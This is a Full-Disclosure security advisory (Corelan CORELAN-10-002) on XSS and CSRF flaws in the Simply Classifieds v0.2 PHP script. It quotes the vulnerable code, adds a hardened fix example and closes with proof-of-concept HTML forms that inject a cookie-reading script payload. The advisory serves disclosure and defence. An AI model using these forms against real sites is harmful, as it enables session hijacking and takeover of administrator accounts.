[Full-disclosure] simply classifieds v0.2 XSS and CSRF Vulnerabilities
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>, <secalert@xxxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>
- Subject: [Full-disclosure] simply classifieds v0.2 XSS and CSRF Vulnerabilities
- From: Steven Seeley <seeleymagic@xxxxxxxxxxx>
- Date: Sun, 10 Jan 2010 22:59:18 +1100
Hello,
Just writing to let you know of some web vulnerabilities in the Simply Classified
PHP script. Attached is the advisory!
Kind regards,
mr_me
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@xxxxxxxxxx |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|
Advisory : CORELAN-10-002
Disclosure date : 10th January 2010
Corelan Reference:
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-002-simply-classifieds-v0.2-xss-and-csrf/
0x00 : Vulnerability information
--------------------------------
[*] Product : Simply Classifieds
[*] Version : 0.2
[*] Vendor : http://orba-design.com/classified.html
[*] URL : http://www.hotscripts.com/listing/simply_classifieds/
[*] Type of vulnerability : XSS and CSRF
[*] Risk rating : Low
[*] Issue fixed in version : <not fixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team
0x01 : Vendor description of software
-------------------------------------
From the vendor website:
This simple classified advertisement application was developed as a favour for a
friend.
I have now ceased development of this script and it is no longer available.
0x02 : Vulnerability details
----------------------------
XSS and CSRF:
The author echoes user-controlled PHP variables ($ar and $description) directly
into the HTML page without any output encoding.
edit_cats.php - line 86:
<td align="center">Description:
<input name="description" type="text" value="<?php echo "$description";?>"
autocomplete="off" size="40" maxlength="40" />
</td>
</tr>
edit_adverts.php - line 120:
<td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>";
?> </td>
In order to trigger the vulnerability, a user/admin must be tricked into
clicking on a malicious URL (or submitting a crafted form from another site).
This would allow an attacker to execute JavaScript code in the context of the
user/admin session and possibly gain administrative access.
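The following is an added example written for this report, not code from the
Simply Classifieds script or its author. It shows how the two output sites quoted
above would look once hardened, and adds the per-session CSRF token that the
original forms lack. The helper names (h, csrf_token, csrf_check) and the form
layout are assumptions; $description and $ar are the variables named in the
advisory.

```php
<?php
// Added example (not the Simply Classifieds code): hardened versions of the
// edit_cats.php / edit_adverts.php output sites and a CSRF check for the forms.
// Helper names below are assumptions chosen for this illustration.

session_start();

// --- Output encoding: the fix for the XSS ---
// Encode every user-controlled value at the point it is written into HTML.
// ENT_QUOTES covers attribute context (value="..."), which both sites use.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- CSRF protection: a secret token bound to the session and to each form ---
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any state-changing POST that does not carry the session's token.
// hash_equals() compares in constant time.
function csrf_check(): void
{
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals($_SESSION['csrf_token'] ?? '', $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// edit_cats.php (hardened): the description is validated server side
// (maxlength="40" in the form is only a client-side hint) and encoded on output,
// so a value such as <script>alert(document.cookie)</script> renders as text.
$description = $_POST['description'] ?? '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    csrf_check();
    if (!is_string($description) || strlen($description) > 40) {
        http_response_code(400);
        exit('Invalid description');
    }
    // ... store $description ...
}
?>
<form name="edit_category" action="edit_cats.php" method="post">
  <input type="hidden" name="csrf_token" value="<?php echo h(csrf_token()); ?>" />
  <table align="center">
    <tr>
      <td align="center">Description:
        <input name="description" type="text" value="<?php echo h($description); ?>"
               autocomplete="off" size="40" maxlength="40" />
      </td>
    </tr>
  </table>
  <input type="submit" name="Save" value="Save" />
</form>
<?php
// edit_adverts.php (hardened): the original echoes "<b>$ar</b>". Here the markup
// stays in the template and only the data is encoded; advert_no is also
// required to be an integer, since that is all the lookup needs.
$ar = filter_var($_POST['advert_no'] ?? '', FILTER_VALIDATE_INT);
if ($ar === false) {
    http_response_code(400);
    exit('Invalid advert number');
}
?>
<td colspan="2" align="center" style="font-size:14px"><b><?php echo h((string) $ar); ?></b></td>
```

The token is checked before any state is touched, so a cross-site form post like
the ones in the PoC section fails with a 403 regardless of its field values;
output encoding then covers the case where a hostile value was already stored.
Marking the session cookie SameSite would add a second, browser-enforced layer
against the same cross-site submission.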
0x03 : Vendor communication
---------------------------
[*] 16th December, 2009 : Vendor contacted
[*] 3rd January 2010 : Vendor reminded of vulnerabilities
[*] 10th January 2010 : Public Disclosure
0x04 : Exploit/PoC
------------------
1st:
<form name="new_category" action="http://[server]/classified/new_cats.php"
method="POST">
<table align="center" width="550" border="0" cellspacing="1" cellpadding="1">
<tr>
<input name="category" type="hidden" value="hacked" size="37"
maxlength="30" />
</tr>
<tr>
<input name="description" type="hidden"
value="<script>alert(document.cookie)</script>" size="40" maxlength="40" />
</tr>
<tr>
<input type="submit" name="Create" id="Create" value="Create" >
</tr>
</table>
</form>
2nd:
<form name="get_advert" action="http://[server]/classified/edit_advert.php"
method="post">
<select name="advert_no" size="1">
<option value="<script>alert(document.cookie)</script>">editme :)
<input type="submit" name="Go" id="Go" value="Go" >
</form>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/